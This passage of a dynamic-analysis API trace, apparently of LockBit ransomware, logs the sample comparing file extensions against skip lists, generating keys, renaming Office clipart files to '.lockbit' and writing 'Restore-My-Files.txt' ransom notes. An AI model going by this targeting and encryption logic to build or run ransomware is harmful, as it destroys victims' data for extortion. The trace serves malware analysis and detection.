(lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.570] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.571] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.571] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.572] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.572] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.572] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01084_.WMF") returned 1 [0114.572] lstrcmpiW (lpString1="ntldr", lpString2="FD01084_.WMF") returned 1 [0114.572] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01084_.WMF") returned 1 [0114.572] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01084_.WMF") returned -1 [0114.572] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01084_.WMF") returned -1 [0114.572] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01084_.WMF") returned 1 [0114.572] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01084_.WMF") returned 1 [0114.572] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.572] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned=".WMF" [0114.572] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.572] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.572] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.572] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.572] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.612] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.612] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.612] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.612] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.613] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.613] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.lockbit") returned 72 [0115.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0115.614] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.614] malloc (_Size=0x40068) returned 0x3e70008 [0115.614] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2412) returned 1 [0115.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0115.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.616] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0115.616] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0115.676] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.677] malloc (_Size=0xa6) returned 0x77d7a8 [0115.677] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.678] free (_Block=0x77d7a8) [0115.678] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.678] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.678] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.678] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ff1000, ftCreationTime.dwHighDateTime=0x1bd4bfe, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78ff1000, ftLastWriteTime.dwHighDateTime=0x1bd4bfe, nFileSizeHigh=0x0, nFileSizeLow=0x1378, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01176_.WMF", cAlternateFileName="")) returned 1 [0115.678] lstrcmpiW (lpString1=".", lpString2="FD01176_.WMF") returned -1 [0115.678] lstrcmpiW (lpString1="..", lpString2="FD01176_.WMF") returned -1 [0115.678] PathFindExtensionW (pszPath="FD01176_.WMF") returned=".WMF" [0115.678] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.678] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.679] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.679] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.680] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01176_.WMF") returned 1 [0115.680] lstrcmpiW (lpString1="ntldr", lpString2="FD01176_.WMF") returned 1 [0115.680] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01176_.WMF") returned 1 [0115.680] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01176_.WMF") returned -1 [0115.680] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01176_.WMF") returned -1 [0115.680] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01176_.WMF") returned 1 [0115.681] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01176_.WMF") returned 1 [0115.681] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.681] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned=".WMF" [0115.681] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.681] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.681] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.682] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.682] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.682] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.682] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.682] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.682] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.682] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.682] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.lockbit") returned 72 [0115.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0115.683] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.683] malloc (_Size=0x40068) returned 0x1ff1e60 [0115.683] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4984) returned 1 [0115.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0115.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0115.684] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0115.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.689] malloc (_Size=0xa6) returned 0x77d7a8 [0115.689] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.689] free (_Block=0x77d7a8) [0115.689] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.689] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.690] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d752900, ftCreationTime.dwHighDateTime=0x1bd4bf0, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d752900, ftLastWriteTime.dwHighDateTime=0x1bd4bf0, nFileSizeHigh=0x0, nFileSizeLow=0xf7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01191_.WMF", cAlternateFileName="")) returned 1 [0115.690] lstrcmpiW (lpString1=".", lpString2="FD01191_.WMF") returned -1 [0115.690] lstrcmpiW (lpString1="..", lpString2="FD01191_.WMF") returned -1 [0115.690] PathFindExtensionW (pszPath="FD01191_.WMF") returned=".WMF" [0115.690] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.690] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.691] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.691] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01191_.WMF") returned 1 [0115.692] lstrcmpiW (lpString1="ntldr", lpString2="FD01191_.WMF") returned 1 [0115.692] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01191_.WMF") returned 1 [0115.692] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01191_.WMF") returned -1 [0115.692] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01191_.WMF") returned -1 [0115.692] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01191_.WMF") returned 1 [0115.692] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01191_.WMF") returned 1 [0115.692] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.692] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned=".WMF" [0115.692] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.692] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.692] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.693] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.693] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.lockbit") returned 72 [0115.693] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0115.698] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.698] malloc (_Size=0x40068) returned 